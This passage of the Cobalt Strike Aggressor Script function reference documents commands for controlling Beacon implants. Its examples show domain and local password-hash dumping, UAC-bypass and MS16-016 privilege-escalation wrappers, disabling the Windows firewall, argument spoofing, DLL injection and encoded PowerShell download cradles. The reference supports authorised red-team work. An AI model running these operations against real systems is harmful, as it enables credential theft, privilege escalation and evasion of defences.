Functions

This is a list of Aggressor Script's functions

-hasbootstraphint

Check if a byte array has the x86 or x64 bootstrap hint. Use this function to determine if it's safe to use an artifact that passes GetProcAddress/GetModuleHandleA pointers to this payload.

Arguments

$1 - byte array with a payload or shellcode.

See also

&payload_bootstrap_hint

-is64

Check if a session is on an x64 system or not (Beacon only).

Arguments

$1 - Beacon/Session ID

Example

command x64 {
   foreach $session (beacons()) {
      if (-is64 $session['id']) {
         println($session);
      }
   }
}

-isactive

Check if a session is active or not. A session is considered active if (a) it has not acknowledged an exit message AND (b) it is not disconnected from a parent Beacon.

Arguments

$1 - Beacon/Session ID

Example

command active {
   local('$bid');
   foreach $bid (beacon_ids()) {
      if (-isactive $bid) {
         println("$bid is active!");
      }
   }
}

-isadmin

Check if a session has admin rights

Arguments

$1 - Beacon/Session ID

Example

command admin_sessions {
   foreach $session (beacons()) {
      if (-isadmin $session['id']) {
         println($session);
      }
   }
}

-isbeacon

Check if a session is a Beacon or not.

Arguments

$1 - Beacon/Session ID

Example

command beacons {
   foreach $session (beacons()) {
      if (-isbeacon $session['id']) {
         println($session);
      }
   }
}

-isssh

Check if a session is an SSH session or not.

Arguments

$1 - Beacon/Session ID

Example

command ssh_sessions {
   foreach $session (beacons()) {
      if (-isssh $session['id']) {
         println($session);
      }
   }
}

action

Post a public action message to the event log. This is similar to the /me command.

Arguments

$1 - the message

Example

action("dances!");

addTab

create a tab to display a GUI object.

Arguments

$1 - the title of the tab

$2 - a GUI object. A GUI object is one that is an instance of javax.swing.JComponent.

$3 - a tooltip to display when a user hovers over this tab.

Example

$label = [new javax.swing.JLabel: "Hello World"];
addTab("Hello!", $label, "this is an example");

addVisualization

Register a visualization with Cobalt Strike.

Arguments

$1 - the name of the visualization

$2 - a javax.swing.JComponent object

Example

$label = [new javax.swing.JLabel: "Hello World!"];
addVisualization("Hello World", $label);
See also

&showVisualization

add_to_clipboard

Add text to the clipboard, notify the user.

Arguments

$1 - the text to add to the clipboard

Example

add_to_clipboard("Paste me you fool!");

alias

Creates an alias command in the Beacon console

Arguments

$1 - the alias name to bind to

$2 - a callback function. Called when the user runs the alias. Arguments are: $0 = command run, $1 = beacon id, $2 = arguments.

Example

alias("foo", {
   btask($1, "foo!");
});

alias_clear

Removes an alias command (and restores default functionality; if it existed)

Arguments

$1 - the alias name to remove

Example

alias_clear("foo");

all_payloads

Generates all of the stageless payloads (in x86 and x64) for all of the configured listeners. (also available in the UI menu under Payloads -> Windows Stageless Generate all Payloads)

Aruments

$1 - The folder path to create the payloads in.

$2 - A boolean value for whether the executable files should be signed.

$3 – A string value for the system call method. Valid values are:

None: Use the standard Windows API function.

Direct: Use the Nt* version of the function.

Indirect: Jump to the appropriate instruction within the Nt* version of the function.

Example

$folder = all_payloads "/tmp/payloads", 1, "None");
println("Payloads have been saved to $folder");

applications

Returns a list of application information in Cobalt Strike's data model. These applications are results from the System Profiler.

Returns

An array of dictionary objects with information about each application.

Example

printAll(applications());

archives

Returns a massive list of archived information about your activity from Cobalt Strike's data model. This information is leaned on heavily to reconstruct your activity timeline in Cobalt Strike's reports.

Returns

An array of dictionary objects with information about your team's activity.

Example

foreach $index => $entry (archives()) {
   println("\c3( $+ $index $+ )\o $entry");
}

artifact

DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &artifact_stager instead.

Generates a stager artifact (exe, dll) from a Cobalt Strike listener

Arguments

$1 - the listener name

$2 - the artifact type

$3 - deprecated; this parameter no longer has any meaning.

$4 - x86|x64 - the architecture of the generated stager

Type Description
dll an x86 DLL
dllx64 an x64 DLL
exe a plain executable
powershell a powershell script
python a python script
svcexe a service executable
vbscript a Visual Basic script

Note

Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.

Returns

A scalar containing the specified artifact.

Example

$data = artifact("my listener", "exe");

$handle = openf(">out.exe");
writeb($handle, $data);
closef($handle);

artifact_general

Generates a payload artifact from arbitrary shellcode.

Arguments

$1 - the shellcode

$2 - the artifact type

$3 - x86|x64 - the architecture of the generated payload

Type Description
dll a DLL
exe a plain executable
powershell a powershell script
python a python script
svcexe a service executable

Note

While the Python artifact in Cobalt Strike is designed to simultaneously carry an x86 and x64 payload; this function will only populate the script with the architecture argument specified as $3

artifact_payload

Generates a stageless payload artifact (exe, dll) from a Cobalt Strike listener name

Arguments

$1 - the listener name

$2 - the artifact type

$3 - x86|x64 - the architecture of the generated payload (stage)

$4 - exit method: 'thread' (leave the thread when done) or 'process' (exit the process when done). Use 'thread' if injecting into an existing process.

$5 – A string value for the system call method. Valid values are:

None: Use the standard Windows API function.

Direct: Use the Nt* version of the function.

Indirect: Jump to the appropriate instruction within the Nt* version of the function.

Type Description
dll a DLL
exe a plain executable
powershell a powershell script
python a python script
raw raw payload stage
svcexe a service executable

Note

While the Python artifact in Cobalt Strike is designed to simultaneously carry an x86 and x64 payload; this function will only populate the script with the architecture argument specified as $3

Example

$data = artifact_payload("my listener", "exe", "x86", “process”, “Indirect”);

artifact_sign

Sign an EXE or DLL file

Arguments

$1 - the contents of the EXE or DLL file to sign

Notes

  • This function requires that a code-signing certificate is specified in this server's Malleable C2 profile. If no code-signing certificate is configured, this function will return $1 with no changes.
  • DO NOT sign an executable or DLL twice. The library Cobalt Strike uses for code-signing will create an invalid (second) signature if the executable or DLL is already signed.

Returns

A scalar containing the signed artifact.

Example

# generate an artifact!
$data = artifact("my listener", "exe");

# sign it.
$data = artifact_sign($data);

# save it
$handle = openf(">out.exe");
writeb($handle, $data);
closef($handle);

artifact_stageless

DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &artifact_payload instead.

Generates a stageless artifact (exe, dll) from a (local) Cobalt Strike listener

Arguments

$1 - the listener name (must be local to this team server)

$2 - the artifact type

$3 - x86|x64 - the architecture of the generated payload (stage)

$4 - proxy configuration string

$5 - callback function. This function is called when the artifact is ready. The $1 argument is the stageless content.

Type Description
dll an x86 DLL
dllx64 an x64 DLL
exe a plain executable
powershell a powershell script
python a python script
raw raw payload stage
svcexe a service executable

Notes

  • This function provides the stageless artifact via a callback function. This is necessary because Cobalt Strike generates payload stages on the team server.
  • The proxy configuration string is the same string you would use with Payloads -> Windows Stegeless Payload. *direct* ignores the local proxy configuration and attempts a direct connection. protocol://user:[email protected]:port specifies which proxy configuration the artifact should use. The username and password are optional (e.g., protocol://host:port is fine). The acceptable protocols are socks and http. Set the proxy configuration string to $null or "" to use the default behavior. Custom dialogs may use &drow_proxyserver to set this.
  • This function cannot generate artifacts for listeners on other team servers. This function also cannot generate artifacts for foreign listeners. Limit your use of this function to local listers with stages only. Custom dialogs may use &drow_listener_stage to choose an acceptable listener for this function.
  • Note: while the Python artifact in Cobalt Strike is designed to simultaneously carry an x86 and x64 payload; this function will only populate the script with the architecture argument specified as $3

Example

sub ready {
   local('$handle');
   $handle = openf(">out.exe");
   writeb($handle, $1);
   closef($handle);
}

artifact_stageless("my listener", "exe", "x86", "", &ready);

artifact_stager

Generates a stager artifact (exe, dll) from a Cobalt Strike listener

Arguments

$1 - the listener name

$2 - the artifact type

$3 - x86|x64 - the architecture of the generated stager

Type Description
dll a DLL
exe a plain executable
powershell a powershell script
python a python script
raw the raw file
svcexe a service executable
vbscript a Visual Basic script

Note

Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.

Returns

A scalar containing the specified artifact.

Example

$data = artifact_stager("my listener", "exe", "x86");
 
$handle = openf(">out.exe");
writeb($handle, $data);
closef($handle);

barch

Returns the architecture of your Beacon session (e.g., x86 or x64)

Arguments

$1 - the id for the beacon to pull metadata for

Note

If the architecture is unknown (e.g., a DNS Beacon that hasn't sent metadata yet); this function will return x86.

Example

println("Arch is: " . barch($1));

bargue_add

This function adds an option to Beacon's list of commands to spoof arguments for.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command to spoof arguments for. Environment variables are OK here too.

$3 - the fake arguments to use when the specified command is run.

Notes

  • The process match is exact. If Beacon tries to launch "net.exe", it will not match net, NET.EXE, or c:\windows\system32\net.exe. It will only match net.exe.
  • x86 Beacon can only spoof arguments in x86 child processes. Likewise, x64 Beacon can only spoof arguments in x64 child processes.
  • The real arguments are written to the memory space that holds the fake arguments. If the real arguments are longer than the fake arguments, the command launch will fail.

Example

# spoof cmd.exe arguments.
bargue_add($1, "%COMSPEC%", "/K \"cd c:\windows\temp & startupdatenow.bat\"");

# spoof net arguments
bargue_add($1, "net", "user guest /active:no");

bargue_list

List the commands + fake arguments Beacon will spoof arguments for.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

bargue_list($1);

bargue_remove

This function removes an option to Beacon's list of commands to spoof arguments for.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command to spoof arguments for. Environment variables are OK here too.

Example

# don't spoof cmd.exe
bargue_remove($1, "%COMSPEC%");

base64_decode

Unwrap a base64-encoded string

Arguments

$1 - the string to decode

Returns

The argument processed by a base64 decoder

Example

println(base64_decode(base64_encode("this is a test")));

base64_encode

Base64 encode a string

Arguments

$1 - the string to encode

Returns

The argument processed by a base64 encoder

Example

println(base64_encode("this is a test"));

bblockdlls

Launch child processes with binary signature policy that blocks non-Microsoft DLLs from loading in the process space.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - true or false; block non-Microsoft DLLs in child process

Note

This attribute is available in Windows 10 only.

Example

on beacon_initial {
   binput($1, "blockdlls start");
   bblockdlls($1, true);
}

bbrowser

Generate the beacon browser GUI component. Shows only Beacons.

Returns

The beacon browser GUI object (a javax.swing.JComponent)

Example

addVisualization("Beacon Browser", bbrowser());
See also

&showVisualization

bbrowserpivot

Start a Browser Pivot

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to inject the browser pivot agent into.

$3 - the architecture of the target PID (x86|x64)

Example

bbrowserpivot($1, 1234, "x86");

bbrowserpivot_stop

Stop a Browser Pivot

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

bbrowserpivot_stop($1);

bbypassuac

REMOVED Removed in Cobalt Strike 4.0.

bcancel

Cancel a file download

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the file to cancel or a wildcard.

Example

item "&Cancel Downloads" {
   bcancel($1, "*");
}

bcd

Ask a Beacon to change it's current working directory.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the folder to change to.

Example

# create a command to change to the user's home directory
alias home {
   $home = "c:\\users\\" . binfo($1, "user");
   bcd($1, $home);
}

bcheckin

Ask a Beacon to checkin. This is basically a no-op for Beacon.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

item "&Checkin" {
   binput($1, "checkin");
   bcheckin($1);
}

bclear

This is the "oops" command. It clears the queued tasks for the specified beacon.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

bclear($1);

bconnect

Ask Beacon (or SSH session) to connect to a Beacon peer over a TCP socket

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the target to connect to

$3 - [optional] the port to use. Default profile port is used otherwise.

Note

Use &beacon_link if you want a script function that will connect or link based on a listener configuration.

Example

bconnect($1, "DC");

bcovertvpn

Ask Beacon to deploy a Covert VPN client.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the Covert VPN interface to deploy

$3 - the IP address of the interface [on target] to bridge into

$4 - [optional] the MAC address of the Covert VPN interface

Example

bcovertvpn($1, "phear0", "172.16.48.18");

bcp

Ask Beacon to copy a file or folder.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the file or folder to copy

$3 - the destination


Example

bcp($1, "evil.exe", "\\\\target\\C$\\evil.exe");

bdata

Get metadata for a Beacon session.

Arguments

$1 - the id for the beacon to pull metadata for

Returns

A dictionary object with metadata about the Beacon session.

Example

println(bdata("1234"));

bdcsync

Use mimikatz's dcsync command to pull a user's password hash from a domain controller. This function requires a domain administrator trust relationship.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - fully qualified name of the domain

$3 - DOMAIN\user to pull hashes for (optional)

$4 - the PID to inject the dcsync command into or $null

$5 - the architecture of the target PID (x86|x64) or $null

Note

If $3 is left out, dcsync will dump all domain hashes.

Examples

Spawn a temporary process
# dump a specific account
bdcsync($1, "PLAYLAND.testlab", "PLAYLAND\\Administrator");

# dump all accounts
bdcsync($1, "PLAYLAND.testlab");
Inject into the specified process
# dump a specific account
bdcsync($1, "PLAYLAND.testlab", "PLAYLAND\\Administrator", 1234, "x64");

# dump all accounts
bdcsync($1, "PLAYLAND.testlab", $null, 1234, "x64");

bdesktop

Start a VNC session.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

item "&Desktop (VNC)" {
   bdesktop($1); 
}

bdllinject

Inject a Reflective DLL into a process.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to inject the DLL into

$3 - the local path to the Reflective DLL

Example

bdllinject($1, 1234, script_resource("test.dll"));

bdllload

Call LoadLibrary() in a remote process with the specified DLL.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the target process PID

$3 - the on-target path to a DLL

Note

The DLL must be the same architecture as the target process.

Example

bdllload($1, 1234, "c:\\windows\\mystuff.dll");

bdllspawn

Spawn a Reflective DLL as a Beacon post-exploitation job.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the local path to the Reflective DLL

$3 - a parameter to pass to the DLL

$4 - a short description of this post exploitation job (shows up in jobs output)

$5 - how long to block and wait for output (specified in milliseconds)

$6 - true/false; use impersonated token when running this post-ex job?

Notes

  • This function will spawn an x86 process if the Reflective DLL is an x86 DLL. Likewise, if the Reflective DLL is an x64 DLL, this function will spawn an x64 process.
  • A well-behaved Reflective DLL follows these rules:
    • Receives a parameter via the reserved DllMain parameter when the DLL_PROCESS_ATTACH reason is specified.
    • Prints messages to STDOUT
    • Calls fflush(stdout) to flush STDOUT
    • Calls ExitProcess(0) when done. This kills the spawned process to host the capability.

Example (ReflectiveDll.c)

This example is based on Stephen Fewer's Reflective DLL Injection Project:

BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ) {
   BOOL bReturnValue = TRUE;
   switch( dwReason ) {
      case DLL_QUERY_HMODULE:
         if( lpReserved != NULL )
            *(HMODULE *)lpReserved = hAppInstance;
         break;
      case DLL_PROCESS_ATTACH:
         hAppInstance = hinstDLL;
   
         /* print some output to the operator */
         if (lpReserved != NULL) {
            printf("Hello from test.dll. 
            Parameter is '%s'\n", (char *)lpReserved);
         }
         else {
            printf("Hello from test.dll. There is no parameter\n");
         }

         /* flush STDOUT */
         fflush(stdout);

         /* we're done, so let's exit */
         ExitProcess(0);
         break;
      case DLL_PROCESS_DETACH:
      case DLL_THREAD_ATTACH:
      case DLL_THREAD_DETACH:
         break;
   }
   return bReturnValue;
}

Example (Aggressor Script)

alias hello {
   bdllspawn($1, script_resource("reflective_dll.dll"), $2, 
   "test dll", 5000, false);
}

bdownload

Ask a Beacon to download a file

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the file to request

Example

bdownload($1, "c:\\sysprep.inf");

bdrives

Ask Beacon to list the drives on the compromised system

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

item "&Drives" {
   binput($1, "drives");
   bdrives($1);
}

beacon_command_describe

Describe a Beacon command.

Returns

A string description of the Beacon command.

Arguments

$1 - the command

Example

println(beacon_command_describe("ls"));

beacon_command_detail

Get the help information for a Beacon command.

Returns

A string with helpful information about a Beacon command.

Arguments

$1 - the command

Example

println(beacon_command_detail("ls"));

beacon_command_register

Register help information for a Beacon command.

Arguments

$1 - the command

$2 - the short description of the command

$3 - the long-form help for the command.

Example

alis echo {
   blog($1, "You typed: " . substr($1, 5));
}

beacon_command_register(
   "echo", 
   "echo text to beacon log", 
   "Synopsis: echo [arguments]\n\nLog arguments to the beacon console");

beacon_commands

Get a list of Beacon commands.

Returns

An array of Beacon commands.

Example

printAll(beacon_commands());

beacon_data

Get metadata for a Beacon session.

Arguments

$1 - the id for the beacon to pull metadata for

Returns

A dictionary object with metadata about the Beacon session.

Example

println(beacon_data("1234"));

beacon_elevator_describe

Describe a Beacon command elevator exploit

Returns

A string description of the Beacon command elevator

Arguments

$1 - the exploit

Example

println(beacon_elevator_describe("uac-token-duplication"));
See Also

&beacon_elevator_register, &beacon_elevators, &belevate_command

beacon_elevator_register

Register a Beacon command elevator with Cobalt Strike. This adds an option to the runasadmin command.

Arguments

$1 - the exploit short name

$2 - a description of the exploit

$3 - the function that implements the exploit ($1 is the Beacon ID, $2 the command and arguments)

Example

# Integrate schtasks.exe (via SilentCleanup) Bypass UAC attack
# Sourced from Empire: https://github.com/EmpireProject/Empire/tree/master/data/module_source/privesc
sub schtasks_elevator {
   local('$handle $script $oneliner $command');

   # acknowledge this command
   btask($1, "Tasked Beacon to execute $2 in a high integrity context", "T1088");

   # read in the script
   $handle = openf(getFileProper(script_resource("modules"), "Invoke-EnvBypass.ps1"));
   $script = readb($handle, -1);
   closef($handle);

   # host the script in Beacon
   $oneliner = beacon_host_script($1, $script);

   # base64 encode the command
   $command  = transform($2, "powershell-base64");

   # run the specified command via this exploit.
   bpowerpick!($1, "Invoke-EnvBypass -Command \" $+ $command $+ \"", $oneliner);
}

beacon_elevator_register("uac-schtasks", "Bypass UAC with schtasks.exe (via SilentCleanup)", &schtasks_elevator);
See Also

&beacon_elevator_describe, &beacon_elevators, &belevate_command

beacon_elevators

Get a list of command elevator exploits registered with Cobalt Strike.

Returns

An array of Beacon command elevators

Example

printAll(beacon_elevators());
See also

&beacon_elevator_describe, &beacon_elevator_register, &belevate_command

beacon_execute_job

Run a command and report its output to the user.

Arguments

$1 - the Beacon ID

$2 - the command to run (environment variables are resolved)

$3 - the command arguments (environment variables are not resolved).

$4 - flags that change how the job is launched (e.g., 1 = disable WOW64 file system redirection)

Notes

  • The string $2 and $3 are combined as-is into a command line. Make sure you begin $3 with a space!
  • This is the mechanism Cobalt Strike uses for its shell and powershell commands.

Example

alias shell {
   local('$args');
   $args = substr($0, 6);
   btask($1, "Tasked beacon to run: $args", "T1059");
   beacon_execute_job($1, "%COMSPEC%", " /C $args", 0);
}

beacon_exploit_describe

Describe a Beacon exploit

Returns

A string description of the Beacon exploit

Arguments

$1 - the exploit

Example

println(beacon_exploit_describe("ms14-058"));
See Also

&beacon_exploit_register, &beacon_exploits, &belevate

beacon_exploit_register

Register a Beacon privilege escalation exploit with Cobalt Strike. This adds an option to the elevate command.

Arguments

$1 - the exploit short name

$2 - a description of the exploit

$3 - the function that implements the exploit ($1 is the Beacon ID, $2 is the listener)

Example

# Integrate windows/local/ms16_016_webdav from Metasploit
# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms16_016_webdav.rb

sub ms16_016_exploit {
   local('$stager');
   
   # check if we're on an x64 system and error out.
   if (-is64 $1) {
      berror($1, "ms16-016 exploit is x86 only");
      return;
   }

   # acknowledge this command
   btask($1, "Task Beacon to run " . listener_describe($2) . " via ms16-016", "T1068");

   # generate our shellcode
   $stager = payload($2, "x86");

   # spawn a Beacon post-ex job with the exploit DLL
   bdllspawn!($1, getFileProper(script_resource("modules"), "cve-2016-0051.x86.dll"), $stager, "ms16-016", 5000);

   # link to our payload if it's a TCP or SMB Beacon
   beacon_link($1, $null, $2);
}

beacon_exploit_register("ms16-016", "mrxdav.sys WebDav Local Privilege Escalation (CVE 2016-0051)", &ms16_016_exploit);
See Also

&beacon_exploit_describe, &beacon_exploits, &belevate

beacon_exploits

Get a list of privilege escalation exploits registered with Cobalt Strike.

Returns

An array of Beacon exploits.

Example

printAll(beacon_exploits());
See also

&beacon_exploit_describe, &beacon_exploit_register, &belevate

beacon_host_imported_script

Locally host a previously imported PowerShell script within Beacon and return a short script that will download and invoke this script.

Arguments

$1 - the id of the Beacon to host this script with.

Returns

A short PowerShell script to download and evaluate the previously script when run. How this one-liner is used is up to you!

Example

alias powershell {
   local('$args $cradle $runme $cmd');
   
   # $0 is the entire command with no parsing.
   $args   = substr($0, 11);
   
   # generate the download cradle (if one exists) for an imported PowerShell script
   $cradle = beacon_host_imported_script($1);
   
   # encode our download cradle AND cmdlet+args we want to run
   $runme  = base64_encode( str_encode($cradle . $args, "UTF-16LE") );
   
   # Build up our entire command line.
   $cmd    = " -nop -exec bypass -EncodedCommand \" $+ $runme $+ \"";
   
   # task Beacon to run all of this.
   btask($1, "Tasked beacon to run: $args", "T1086");
   beacon_execute_job($1, "powershell", $cmd, 1);
}

beacon_host_script

Locally host a PowerShell script within Beacon and return a short script that will download and invoke this script. This function is a way to run large scripts when there are constraints on the length of your PowerShell one-liner.

Arguments

$1 - the id of the Beacon to host this script with.

$2 - the script data to host.

Returns

A short PowerShell script to download and evaluate the script when run. How this one-liner is used is up to you!

Example

alias test {
   local('$script $hosted');
   $script = "2 + 2";
   $hosted = beacon_host_script($1, $script);
   
   binput($1, "powerpick $hosted");
   bpowerpick($1, $hosted);
}

beacon_ids

Get the ID of all Beacons calling back to this Cobalt Strike team server.

Returns

An array of beacon IDs

Example

foreach $bid (beacon_ids()) {
   println("Bid: $bid");
}

beacon_info

Get information from a Beacon session's metadata.

Arguments

$1 - the id for the beacon to pull metadata for

$2 - the key to extract

Returns

A string with the requested information.

Example

println("User is: " . beacon_info("1234", "user"));
println("PID  is: " . beacon_info("1234", "pid"));

beacon_inline_execute

Execute a Beacon Object File

Arguments

$1 - the id for the Beacon

$2 - a string containing the BOF file

$3 - the entry point to call

$4 - packed arguments to pass to the BOF file

Note

The Cobalt Strike documentation has a page specific to BOF files. See Beacon Object Files.

Example (hello.c)

/*
* Compile with:
* x86_64-w64-mingw32-gcc -c hello.c -o hello.x64.o
* i686-w64-mingw32-gcc -c hello.c -o hello.x86.o
*/

#include "windows.h"
#include "stdio.h"
#include "tlhelp32.h"
#include "beacon.h"

void demo(char * args, int length) {
   datap  parser;
   char * str_arg;
   int    num_arg;
   
   BeaconDataParse(&parser, args, length);
   str_arg = BeaconDataExtract(&parser, NULL);
   num_arg = BeaconDataInt(&parser);
   
   BeaconPrintf(CALLBACK_OUTPUT, "Message is %s with %d arg", str_arg, num_arg);
}

Example (hello.cna)

alias hello {
   local('$barch $handle $data $args');

   # figure out the arch of this session
   $barch  = barch($1);

   # read in the right BOF file
   $handle = openf(script_resource("hello. $+ $barch $+ .o"));
   $data   = readb($handle, -1);
   closef($handle);

   # pack our arguments
   $args   = bof_pack($1, "zi", "Hello World", 1234);

   # announce what we're doing
   btask($1, "Running Hello BOF");
   
   # execute it.
   beacon_inline_execute($1, $data, "demo", $args);
}
See Also

&bof_pack

beacon_link

This function links to an SMB or TCP listener. If the specified listener is not an SMB or TCP listener, this function does nothing.

Arguments

$1 - the id of the beacon to link through

$2 - the target host to link to. Use $null for localhost.

$3 - the listener to link

Example

# smartlink [target] [listener name]
alias smartlink {
   beacon_link($1, $2, $3);
}

beacon_remote_exec_method_describe

Describe a Beacon remote execute method

Returns

A string description of the Beacon remote execute method.

Arguments

$1 - the method

Example

println(beacon_remote_exec_method_describe("wmi"));
See also

&beacon_remote_exec_method_register, &beacon_remote_exec_methods, &bremote_exec

beacon_remote_exec_method_register

Register a Beacon remote execute method with Cobalt Strike. This adds an option for use with the remote-exec command.

Arguments

$1 - the method short name

$2 - a description of the method

$3 - the function that implements the exploit ($1 is the Beacon ID, $2 is the target, $3 is the command+args)

See Also

&beacon_remote_exec_method_describe, &beacon_remote_exec_methods, &bremote_exec

beacon_remote_exec_methods

Get a list of remote execute methods registered with Cobalt Strike.

Returns

An array of remote exec modules.

Example

printAll(beacon_remote_exec_methods());
See also

&beacon_remote_exec_method_describe, &beacon_remote_exec_method_register, &bremote_exec

beacon_remote_exploit_arch

Get the arch info for this Beacon lateral movement option.

Arguments

$1 - the exploit

Returns

x86 or x64

Example

println(beacon_remote_exploit_arch("psexec"));
See Also

&beacon_remote_exploit_register, &beacon_remote_exploits, &bjump

beacon_remote_exploit_describe

Describe a Beacon lateral movement option.

Returns

A string description of the Beacon lateral movement option.

Arguments

$1 - the exploit

Example

println(beacon_remote_exploit_describe("psexec"));
See Also

&beacon_remote_exploit_register, &beacon_remote_exploits, &bjump

beacon_remote_exploit_register

Register a Beacon lateral movement option with Cobalt Strike. This function extends the jump command.

Arguments

$1 - the exploit short name

$2 - the arch associated with this attack (e.g., x86, x64)

$3 - a description of the exploit

$4 - the function that implements the exploit ($1 is the Beacon ID, $2 is the target, $3 is the listener)

See also

&beacon_remote_exploit_describe, &beacon_remote_exploits, &bjump

beacon_remote_exploits

Get a list of lateral movement options registered with Cobalt Strike.

Returns

An array of lateral movement option names.

Example

printAll(beacon_remote_exploits());
See also

&beacon_remote_exploit_describe, &beacon_remote_exploit_register, &bjump

beacon_remove

Remove a Beacon from the display.

Arguments

$1 - the id for the beacon to remove

beacon_stage_pipe

This function handles the staging process for a bind pipe stager. This is an optional stager for lateral movement. You can stage any x86 payload/listener through this stager. Use &stager_bind_pipe to generate this stager.

Arguments

$1 - the id of the beacon to stage through

$2 - the target host

$3 - the listener name

$4 - the architecture of the payload to stage. x86 is the only option right now.

Example

# step 1. generate our stager
$stager = stager_bind_pipe("my listener");

# step 2. do something to run our stager

# step 3. stage a payload via this stager
beacon_stage_pipe($bid, $target, "my listener", "x86");

# step 4. assume control of the payload (if needed)
beacon_link($bid, $target, "my listener");

beacon_stage_tcp

This function handles the staging process for a bind TCP stager. This is the preferred stager for localhost-only staging. You can stage any payload/listener through this stager. Use &stager_bind_tcp to generate this stager.

Arguments

$1 - the id of the beacon to stage through

$2 - reserved; use $null for now.

$3 - the port to stage to

$4 - the listener name

$5 - the architecture of the payload to stage (x86, x64)

Example

# step 1. generate our stager
$stager = stager_bind_tcp("my listener", "x86", 1234);

# step 2. do something to run our stager

# step 3. stage a payload via this stager
beacon_stage_tcp($bid, $target, 1234, "my listener", "x86");

# step 4. assume control of the payload (if needed)
beacon_link($bid, $target, "my listener");

beacons

Get information about all Beacons calling back to this Cobalt Strike team server.

Returns

An array of dictionary objects with information about each beacon.

Example

foreach $beacon (beacons()) {
   println("Bid: " . $beacon['id'] . " is " . $beacon['name']);
}

belevate

Ask Beacon to spawn an elevated session with a registered technique.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the exploit to fire

$3 - the listener to target.

Example

item "&Elevate 31337" {
   openPayloadHelper(lambda({
      binput($bids, "elevate ms14-058 $1");
      belevate($bids, "ms14-058", $1);
   }, $bids => $1));
}
See also

&beacon_exploit_describe, &beacon_exploit_register, &beacon_exploits

belevate_command

Ask Beacon to run a command in a high-integrity context

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the module/command elevator to use

$3 - the command and its arguments.

Example

# disable the firewall
alias shieldsdn {
   belevate_command($1, "uac-token-duplication", "cmd.exe /C netsh advfirewall set allprofiles state off");
}
See also

&beacon_elevator_describe, &beacon_elevator_register, &beacon_elevators

berror

Publish an error message to the Beacon transcript

Arguments

$1 - the id for the beacon to post to

$2 - the text to post

Example

alias donotrun {
   berror($1, "You should never run this command!");
}

bexecute

Ask Beacon to execute a command [without a shell]. This provides no output to the user.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command and arguments to run

Example

bexecute($1, "notepad.exe");

bexecute_assembly

Spawns a local .NET executable assembly as a Beacon post-exploitation job.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the local path to the .NET executable assembly

$3 - parameters to pass to the assembly

Notes

  • This command accepts a valid .NET executable and calls its entry point.
  • This post-exploitation job inherits Beacon's thread token.
  • Compile your custom .NET programs with a .NET 3.5 compiler for compatibility with systems that don't have .NET 4.0 and later.

Example

alias myutil {
   bexecute_assembly($1, script_resource("myutil.exe"), "arg1 arg2 \"arg 3\"");
}

bexit

Ask a Beacon to exit.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

item "&Die" {
   binput($1, "exit");
   bexit($1);
}    

bgetprivs

Attempts to enable the specified privilege in your Beacon session.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - a comma-separated list of privileges to enable. See:

https://msdn.microsoft.com/en-us/library/windows/desktop/bb530716(v=vs.85).aspx

Example

alias debug {
   bgetprivs($1, "SeDebugPriv");
}

bgetsystem

Ask Beacon to attempt to get the SYSTEM token.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

item "Get &SYSTEM" {
   binput($1, "getsystem");
   bgetsystem($1);
}

bgetuid

Ask Beacon to print the User ID of the current token

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

bgetuid($1);

bhashdump

Ask Beacon to dump local account password hashes. If injecting into a pid that process requires administrator privileges.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to inject the hashdump dll into.

$3 - the architecture of the target PID (x86|x64)

Example

Spawn a temporary process
item "Dump &Hashes" {
   binput($1, "hashdump");
   bhashdump($1);
}
Inject into the specified process)
bhashdump($1, 1234, "x64");

bind

Bind a keyboard shortcut to an Aggressor Script function. This is an alternate to the bind keyword.

Arguments

$1 - the keyboard shortcut

$2 - a callback function. Called when the event happens.

Example

# bind Ctrl+Left and Ctrl+Right to cycle through previous and next tab.

bind("Ctrl+Left", {
   previousTab();
});

bind("Ctrl+Right", {
   nextTab();
});
See also

&unbind

binfo

Get information from a Beacon session's metadata.

Arguments

$1 - the id for the beacon to pull metadata for

$2 - the key to extract

Returns

A string with the requested information.

Example

println("User is: " . binfo("1234", "user"));
println("PID  is: " . binfo("1234", "pid"));

binject

Ask Beacon to inject a session into a specific process

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the process to inject the session into

$3 - the listener to target.

$4 - the process architecture (x86 | x64)

Example

binject($1, 1234, "my listener");

binline_execute

Execute a Beacon Object File. This is the same as using the inline-execute command in Beacon.

Arguments

